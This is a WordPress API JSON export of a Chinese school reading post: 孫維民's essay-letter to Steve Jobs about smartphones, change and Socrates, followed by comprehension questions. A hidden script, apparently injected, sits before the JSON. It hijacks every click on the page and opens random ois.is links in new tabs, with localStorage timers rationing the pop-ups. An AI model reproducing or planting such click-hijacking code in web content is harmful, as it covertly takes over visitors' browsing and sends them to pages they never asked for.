<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1207,"date":"2016-03-17T20:42:54","date_gmt":"2016-03-17T12:42:54","guid":{"rendered":"http:\/\/edu.secda.info\/yujuwu\/?p=1207"},"modified":"2016-03-17T20:42:54","modified_gmt":"2016-03-17T12:42:54","slug":"%e5%af%84%e7%b5%a6%e8%b3%88%e4%bc%af%e6%96%af%e7%9a%84%e9%9b%bb%e5%ad%90%e9%83%b5%e4%bb%b6","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/yujuwu\/?p=1207","title":{"rendered":"\u5bc4\u7d66\u8cc8\u4f2f\u65af\u7684\u96fb\u5b50\u90f5\u4ef6"},"content":{"rendered":"<p style=\"margin: 24pt 36pt 12pt; text-align: center;\" align=\"center\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5bc4\u7d66\u8cc8\u4f2f\u65af\u7684\u96fb\u5b50\u90f5\u4ef6<\/span><\/b><b><\/b><\/p>\n<p style=\"margin: 24pt 36pt 12pt; text-align: center;\" align=\"center\"><b><span style=\"font-size: 13pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5b6b\u7dad\u6c11<\/span><\/b><b><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5f9e\u672a\u60f3\u904e\u5beb\u4fe1\u7d66\u4f60\uff0c\u5927\u6982\u4f60\u4e5f\u7121\u6cd5\u60f3\u50cf\u3002\u6211\u5011\u5e7e\u4e4e\u662f\u6beb\u4e0d\u76f8\u5e72\u7684\u5169\u500b\u4eba\u3002\u4f55\u6cc1\u4f60\u6b7b\u4e86\uff0c\u6211\u66f4\u6c92\u6709\u7406\u7531\u6253\u64fe\u4f60\u3002\u4e0d\u904e\uff0c\u4f60\u96d6\u6b7b\u7336\u751f\u3002\u6bcf\u9694\u4e00\u6bb5\u6642\u65e5\uff0c\u96fb\u8996\u5c31\u6709\u860b\u679c\u7684\u65b0\u805e\u3002\u6211\u4e0d\u61c2\u90a3\u4e9b\u65b0\u805e\u7a76\u7adf\u4ee3\u8868\u4ec0\u9ebc\uff0c\u4f46\u4e5f\u4f3c\u4e4e\u53ef\u4ee5\u611f\u67d3\u67d0\u7a2e\u9a37\u52d5\u7684\u60c5\u7dd2\u3002\u73fe\u5728\uff0c\u7ad9\u5728\u53f0\u4e0a\u767c\u8868\u7522\u54c1\u7684\u4eba\u63db\u4e86\uff0c\u4f60\u537b\u5f77\u5f7f\u4e0d\u66fe\u96e2\u958b\u3002\u6bcf\u4e00\u6b21\uff0c\u4ed6\u5011\u7e3d\u662f\u5c07\u4f60\u5f9e\u6b7b\u5f8c\u7684\u4e16\u754c\u53ec\u559a\u56de\u4f86\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6211\u5c1a\u672a\u8b80\u904e\u4f60\u7684\u50b3\u8a18\u3002\u4e0d\u904e\uff0c\u51fa\u65bc\u597d\u5947\uff0c\u6211\u5229\u7528\u7db2\u8def\u67e5\u95b1\u4e86\u4e00\u4e9b\u8cc7\u6599\u3002\u4f60\u7684\u4e00\u751f\u7576\u7136\u662f\u7cbe\u91c7\u7684\uff0c\u800c\u4e14\u5f71\u97ff\u6df1\u9060\u3002\u5728\u6211\u627e\u5230\u7684\u7db2\u7ad9\u4e2d\uff0c\u6709\u4e0d\u5c11\u662f\u95dc\u65bc\u4f60\u7684\u4f73\u53e5\u540d\u8a00\u3002\u7db2\u8def\u88e1\u7684\u8cc7\u6599\u9f90\u5927\u96dc\u4e82\uff0c\u771f\u771f\u5047\u5047\uff0c\u53c8\u50cf\u300a\u5931\u6a02\u5712\u300b\u88e1\u7684\u6492\u65e6\uff0c\u7d93\u5e38\u8b8a\u5f62\uff0c\u7136\u800c\u9019\u4e9b\u540d\u8a00\u4f73\u53e5\u53cd\u8986\u51fa\u73fe\uff0c\u61c9\u8a72\u662f\u771f\u7684\u3002\u9019\u4e9b\u7c21\u6f54\u7684\u53e5\u5b50\u986f\u7136\u4e0d\u80fd\u8868\u9054\u4f60\u6240\u6709\u7684\u60f3\u6cd5\uff0c\u4f46\u65e2\u7136\u5b83\u5011\u662f\u4f60\u8aaa\u904e\u7684\uff0c\u591a\u5c11\u61c9\u8a72\u80fd\u5920\u66ff\u4f60\u767c\u8072\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9019\u662f\u5176\u4e2d\u4e4b\u4e00\uff1a\u300c\u6d3b\u8457\u5c31\u662f\u70ba\u4e86\u6539\u8b8a\u4e16\u754c\uff0c\u96e3\u9053\u9084\u6709\u5176\u4ed6\u7684\u539f\u56e0\u55ce\uff1f\u300d\u7684\u78ba\uff0c\u667a\u6167\u578b\u624b\u6a5f\u51fa\u73fe\u4e4b\u5f8c\uff0c\u4eba\u985e\u7684\u751f\u6d3b\u5df2\u7d93\u5fb9\u5e95\u6539\u8b8a\u4e86\u3002\u5c0d\u65bc\u6211\u5011\u9019\u4e00\u8f29\u7684\u4eba\uff0c\u9019\u500b\u6642\u4ee3\u5145\u6eff\u4e0d\u53ef\u601d\u8b70\u3002\u6211\u5728\u901a\u8eca\u9014\u4e2d\uff0c\u5728\u706b\u8eca\u6216\u6c7d\u8eca\u4e0a\uff0c\u7e3d\u662f\u770b\u5230\u4f4e\u982d\u8207\u667a\u6167\u578b\u624b\u6a5f\u5468\u65cb\u7684\u4eba\u3002\u4ed6\u5011\u5982\u6b64\u5c08\u6ce8\u3001\u6c89\u9ed8\u3001\u81ea\u7136\uff0c\u5c0d\u65bc\u9019\u7a2e\u6a5f\u5668\uff0c\u4ee5\u53ca\u8eab\u8655\u7684\u9ad8\u79d1\u6280\u6587\u660e\uff0c\u4f3c\u4e4e\u5b8c\u5168\u6c92\u6709\u7591\u616e\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4f7f\u7528\u667a\u6167\u578b\u624b\u6a5f\u7684\u4eba\uff0c\u6211\u767c\u73fe\uff0c\u53ea\u8981\u5f7c\u6b64\u7121\u8a71\u53ef\u8aaa\uff0c\u4fbf\u6703\u5404\u81ea\u8207\u81ea\u5df1\u7684\u7db2\u7ad9\u6216\u904a\u6232\u4ea4\u8ac7\uff0c\u4e00\u65b9\u9762\u907f\u514d\u5c37\u5c2c\uff0c\u53e6\u4e00\u65b9\u9762\uff0c\u6211\u60f3\uff0c\u4e5f\u662f\u4e00\u7a2e\u5ba3\u793a\uff1a\u300c\u6211\u4e0d\u5b64\u55ae\uff0c\u6211\u548c\u4e16\u754c\u9023\u7dda\u3002\u300d\u5982\u6b64\u63a8\u6e2c\uff0c\u5f7c\u7b49\u5728\u4f7f\u7528\u667a\u6167\u578b\u624b\u6a5f\u6642\u7684\u81ea\u7136\u795e\u614b\uff0c\u4e5f\u4e0d\u80fd\u7b97\u662f\u975e\u5e38\u81ea\u7136\u4e86\u3002\u5176\u6b21\uff0c\u4ed6\u5011\u5176\u5be6\u61fc\u6015\u5b64\u55ae\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5ee3\u544a\u7e3d\u5c07\u667a\u6167\u578b\u624b\u6a5f\u7684\u4f7f\u7528\u8005\u63cf\u8ff0\u6210\u82f1\u4fca\u3001\u7f8e\u9e97\u3001\u5e74\u8f15\u3001\u591a\u91d1\uff0c\u7a2e\u7a2e\u5176\u5be6\u548c\u624b\u6a5f\u7121\u95dc\u7684\u6697\u793a\uff0c\u5927\u6982\u4e5f\u5feb\u8981\u6f14\u5316\u70ba\u96c6\u9ad4\u8a18\u61b6\u4e86\u3002\u90a3\u4e9b\u62ff\u8457\u624b\u6a5f\uff0c\u6b63\u5728\u63a5\u6253\u6216\u51dd\u671b\u7684\u4eba\uff0c\u4e5f\u8a31\u90fd\u6709\u67d0\u7a2e\u932f\u89ba\u5427\uff1a\u6211\u5c31\u662f\u5ee3\u544a\u4e2d\u7684\u4e3b\u89d2\uff0c\u5c6c\u65bc\u7279\u5b9a\u968e\u7d1a\u3002\u6b64\u4e00\u6697\u793a\u5177\u6709\u50ac\u7720\u6548\u679c\uff0c\u4f7f\u5176\u6c89\u6d78\u5728\u6dfa\u8584\u7684\u6a02\u89c0\u88e1\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e0d\u50c5\u662f\u5728\u706b\u8eca\u6216\u6c7d\u8eca\u4e2d\u3002\u73fe\u5728\uff0c\u4efb\u4f55\u5730\u65b9\uff0c\u4efb\u4f55\u6642\u9593\uff0c\u53ea\u8981\u6709\u4eba\uff0c\u5c31\u6709\u9ede\u64a5\u624b\u6a5f\u7684\u4eba\u3002\u4ed6\u5011\u7684\u9762\u8c8c\u975e\u5e38\u985e\u4f3c\uff0c\u96e3\u4ee5\u5206\u8fa8\uff0c\u81f3\u5c11\u5c0d\u6211\u800c\u8a00\u3002\u5e74\u8f15\u5973\u5b50\u5927\u90fd\u5316\u8457\u6fc3\u539a\u7684\u599d\uff0c\u8a87\u5f35\u7684\u776b\u6bdb\u4e0a\u4e0b\u8d77\u843d\uff0c\u50cf\u5446\u677f\u7684\u6d0b\u5a03\u5a03\uff1b\u5e74\u8f15\u7537\u5b50\u4e5f\u5f88\u91cd\u8996\u6253\u626e\uff0c\u5c24\u5176\u982d\u9aee\u65b9\u9762\u3001\u670d\u88dd\u65b9\u9762\u3001\u914d\u4ef6\u65b9\u9762\u3002\u6709\u6642\uff0c\u6211\u8a2d\u6cd5\u56de\u60f3\uff0c\u543e\u8f29\u7576\u5e74\u4e5f\u662f\u9019\u6a23\u6ce8\u91cd\u5916\u8868\u7684\u55ce\uff1f\u4e5f\u8a31\u662f\u5427\u3002\u6216\u8005\uff0c\u56e0\u70ba\u4e0a\u7db2\u5bb9\u6613\uff0c\u5f71\u50cf\u7576\u9053\uff0c\u9023\u5e36\u4e5f\u4f7f\u4eba\u5011\u66f4\u52a0\u5d07\u62dc\u8868\u76f8\uff1f\u4fee\u5716\u8edf\u9ad4\u986f\u7136\u4e0d\u865e\u5331\u4e4f\uff0c\u5f71\u50cf\u7d42\u5c07\u8207\u73fe\u5be6\u5b8c\u5168\u812b\u9264\uff1f\u7121\u8ad6\u5982\u4f55\uff0c\u95dc\u65bc\u88dd\u626e\u4e00\u4e8b\uff0c\u9019\u500b\u6642\u4ee3\u7684\u5e74\u8f15\u4eba\u61c2\u5f97\u66f4\u591a\u3002\u62dc\u7db2\u8def\u4e4b\u8cdc\uff0c\u4ed6\u5011\u7684\u8cc7\u8a0a\u7570\u5e38\u8c50\u5bcc\u548c\u8fc5\u901f\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4f60\u63d0\u5230\u6539\u8b8a\u3002\u53ef\u662f\uff0c\u6539\u8b8a\u4e00\u5b9a\u6b63\u78ba\u55ce\uff1f\u597d\u7684\u4e8b\u7269\u4e0d\u662f\u61c9\u8a72\u52aa\u529b\u7dad\u6301\uff0c\u907f\u514d\u6539\u8b8a\u55ce\uff1f\u4f60\u53ea\u63d0\u6539\u8b8a\uff0c\u4e0d\u63d0\u662f\u975e\uff0c\u4f3c\u4e4e\u6709\u4e9b\u6020\u60f0\u3002\u5206\u8fa8\u5c0d\u932f\u539f\u672c\u5c31\u5f88\u56f0\u96e3\uff0c\u4f60\u7d22\u6027\u9583\u904e\u9019\u5169\u500b\u5b57\u3002\u53ef\u662f\uff0c\u4f60\u8ac7\u8ad6\u6539\u8b8a\u7684\u8a9e\u6c23\u5982\u6b64\u5805\u5b9a\uff0c\u4ee4\u4eba\u89ba\u5f97\u62d2\u7d55\u6539\u8b8a\u5c31\u662f\u932f\u7684\u3002\u9019\u5c31\u4e0d\u592a\u5c0d\u4e86\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e0d\u4e45\u524d\uff0c\u6211\u5230\u6771\u90e8\u51fa\u5dee\u3002\u5728\u99db\u5411\u82b1\u84ee\u7684\u592a\u9b6f\u95a3\u865f\u706b\u8eca\u4e0a\uff0c\u6211\u906d\u9047\u4e86\u5e7e\u4f4d\u7d50\u4f34\u51fa\u904a\u7684\u5927\u5b78\u751f\u3002\u4ed6\u5011\u4e0a\u8eca\u4e4b\u5f8c\uff0c\u5148\u662f\u55a7\u9b27\u4e86\u4e00\u9663\u5b50\uff0c\u96a8\u5f8c\u90fd\u57cb\u9996\u65bc\u81ea\u5df1\u7684\u667a\u6167\u578b\u624b\u6a5f\uff0c\u50cf\u8654\u8aa0\u9ed8\u79b1\u7684\u6559\u5f92\u3002\u7a97\u5916\u539f\u662f\u597d\u5c71\u597d\u6c34\uff0c\u90a3\u4e9b\u5e74\u8f15\u4eba\u537b\u5be7\u53ef\u6ce8\u8996\u865b\u64ec\u7684\u7db2\u8def\u4e16\u754c\u3002\u66ab\u4e14\u4e0d\u8ad6\u7db2\u8def\u5167\u90e8\u7684\u72c0\u6cc1\uff0c\u5b83\u8b93\u4eba\u5011\u8207\u5927\u81ea\u7136\u2500\u2500\u90a3\u4e9b\u96f2\u3001\u8349\u6728\u3001\u6ce2\u6d6a\u3001\u77f3\u982d\u2500\u2500\u5206\u96e2\uff0c\u9019\u5c31\u8db3\u5920\u4ee4\u4eba\u7591\u61fc\u4e86\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e0b\u8eca\u6642\uff0c\u90a3\u4e9b\u5e74\u8f15\u4eba\u4f9d\u7136\u6367\u8457\u624b\u6a5f\u3002\u6211\u8207\u5176\u4e2d\u5169\u4eba\u7684\u76ee\u5149\u77ed\u66ab\u4ea4\u6703\u3002\u4e00\u6642\u4e4b\u9593\uff0c\u6211\u4ee5\u70ba\u770b\u5230\u5c64\u5c64\u758a\u758a\u7684\u7db2\u9801\uff0c\u4e0d\u65b7\u9ad8\u901f\u5730\u8b8a\u63db\uff0c\u7121\u8072\u7684\u3001\u6709\u8072\u7684\uff0c\u5728\u5ba4\u5167\u3001\u5728\u6236\u5916\uff0c\u51b7\u786c\u7684\u87a2\u5e55\u7121\u9650\u4f9b\u61c9\u7db2\u8def\u8a9e\u8a00\uff0c\u800c\u90a3\u7a2e\u8a9e\u8a00\u5efa\u69cb\u4ed6\u5011\u7684\u601d\u60f3\u3002<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4f60\u53e6\u6709\u4e00\u53e5\u540d\u8a00\uff1a\u300c\u6211\u9858\u610f\u7528\u6211\u6240\u6709\u7684\u79d1\u6280\uff0c\u63db\u53d6\u548c\u8607\u683c\u62c9\u5e95\u76f8\u8655\u4e00\u500b\u4e0b\u5348\u3002\u300d\u65e2\u7136\u63d0\u5230\u8607\u683c\u62c9\u5e95\uff0c\u6211\u5148\u7bc0\u9304\u4e00\u6bb5\u67cf\u62c9\u5716\u7684\u5c0d\u8a71\u9304\uff1a<\/span><span style=\"font-size: 11pt; font-family: \u6a19\u6977\u9ad4;\">\u5728\u67d0\u500b\u7f8e\u9e97\u7684\u590f\u65e5\uff0c\u8607\u683c\u62c9\u5e95\u548c\u53cb\u4eba\u8cbb\u5353\u65af\u512a\u9592\u5730\u8eba\u81e5\u5728\u6cb3\u908a\uff0c\u8046\u807d\u8457\u6e05\u6717\u7684\u6cc9\u8072\u8207\u6797\u9593\u7684\u87ec\u9cf4\u3002\u6b64\u6642\uff0c\u8cbb\u5353\u65af\u60f3\u5230\u4e00\u6bb5\u795e\u8a71\u6545\u4e8b\uff1a\u5317\u98a8\u795e\u6ce2\u745e\u4e9e\u65af\u611b\u4e0a\u4e86\u7f8e\u9e97\u7684\u6b50\u91cc\u897f\u96c5\uff0c\u65bc\u662f\u8d81\u5979\u5728\u6cb3\u5cb8\u6232\u6c34\u6642\uff0c\u98b3\u8d77\u4e00\u9663\u98a8\uff0c\u5c07\u5979\u64c4\u8d70\u3002\u5f8c\u4f86\u6b50\u91cc\u897f\u96c5\u70ba\u5317\u98a8\u795e\u751f\u4e86\u5169\u500b\u5152\u5b50\u3002\u60f3\u5230\u9019\u88e1\uff0c\u8cbb\u5353\u65af\u554f\u8607\u683c\u62c9\u5e95\uff1a\u300c\u60a8\u76f8\u4fe1\u9019\u6545\u4e8b\u662f\u771f\u7684\u55ce\uff1f\u300d\u8607\u683c\u62c9\u5e95\u56de\u7b54\uff1a\u300c\u5982\u679c\u6211\u60f3\u8ffd\u4e0a\u6f6e\u6d41\uff0c\u6211\u5927\u53ef\u96a8\u8457\u90a3\u4e9b\u81ea\u8a8d\u6709\u79d1\u5b78\u982d\u8166\u7684\u4eba\u8aaa\uff0c\u6211\u4e0d\u76f8\u4fe1\u9019\u7a2e\u4e8b\u3002\u6211\u751a\u81f3\u53ef\u5f9e\u79d1\u5b78\u7684\u89d2\u5ea6\u53bb\u8a6e\u91cb\u5b83\u2026\u2026\u7136\u800c\u6211\u4e0d\u7fa8\u6155\u90a3\u4e9b\u81ea\u547d\u8070\u660e\u7684\u4eba\u7684\u89e3\u91cb\u3002\u8207\u5176\u52c9\u5f37\u795e\u8a71\u6545\u4e8b\u53bb\u9077\u5c31\u79d1\u5b78\uff0c\u4e0d\u5982\u53cd\u8eab\u81ea\u554f\uff1a\u6211\u662f\u5426\u6bd4\u795e\u8a71\u4eba\u7269\u66f4\u8907\u96dc\u3001\u66f4\u9a55\u50b2\uff0c\u6216\u8005\u66f4\u55ae\u7d14\u3001\u66f4\u6eab\u67d4\uff1f\u300d<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-indent: 22pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4f60\u771f\u7684\u9858\u610f\u4ea4\u63db\u55ce\uff0c\u8cc8\u4f2f\u65af\u5148\u751f\uff1f\u6216\u8005\u53ea\u662f\u4e00\u7a2e\u59ff\u614b\uff1f\u7136\u800c\uff0c\u6211\u6bd4\u8f03\u597d\u5947\u7684\u662f\uff1a\u5982\u679c\u8607\u683c\u62c9\u5e95\u77e5\u9053\u4f60\u9019\u9ebc\u8aaa\uff0c\u4ed6\u53c8\u6703\u5982\u4f55\u56de\u61c9\u5462\uff1f<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-align: right; text-indent: 22pt; line-height: 22pt;\" align=\"right\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9078\u81ea<\/span><span style=\"font-size: 11pt; font-family: \u6a19\u6977\u9ad4;\">\u300a<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u81ea\u7531\u526f\u520a<\/span><span style=\"font-size: 11pt; font-family: \u6a19\u6977\u9ad4;\">\u300b<\/span><span style=\"font-size: 11pt;\">2013.4.17(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; line-height: 22pt;\"><b><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u203b\u95b1\u8b80\u98a8\u5411\u7403<\/span><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">1<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u3001\u4f5c\u8005\u5f15\u7528\u8cc8\u4f2f\u65af\u7684\u90a3\u4e9b\u540d\u8a00\uff1f\u9019\u4e9b\u660e\u8a00\u5728\u6587\u4e2d\u6709\u4f55\u4f5c\u7528\uff1f<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">2<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u3001\u9019\u5c01\u4fe1\u4e3b\u8981\u5728\u50b3\u9054\u600e\u6a23\u7684\u60f3\u6cd5\uff1f\u8acb\u7528<\/span><span style=\"font-size: 11pt;\">150<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u81f3<\/span><span style=\"font-size: 11pt;\">200<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5b57\u9673\u8ff0\u51fa\u4f86\u3002<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5bc4\u7d66\u8cc8\u4f2f\u65af\u7684\u96fb\u5b50\u90f5\u4ef6 \u5b6b\u7dad\u6c11 \u5f9e\u672a\u60f3\u904e\u5beb\u4fe1\u7d66\u4f60\uff0c\u5927\u6982\u4f60\u4e5f\u7121\u6cd5\u60f3\u50cf\u3002\u6211\u5011\u5e7e\u4e4e\u662f\u6beb\u4e0d\u76f8\u5e72\u7684\u5169\u500b\u4eba\u3002\u4f55\u6cc1\u4f60\u6b7b\u4e86\uff0c\u6211\u66f4 [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[46,1,60,42,56,63],"tags":[91,89,100],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1207"}],"collection":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1207"}],"version-history":[{"count":1,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1207\/revisions"}],"predecessor-version":[{"id":1208,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1207\/revisions\/1208"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}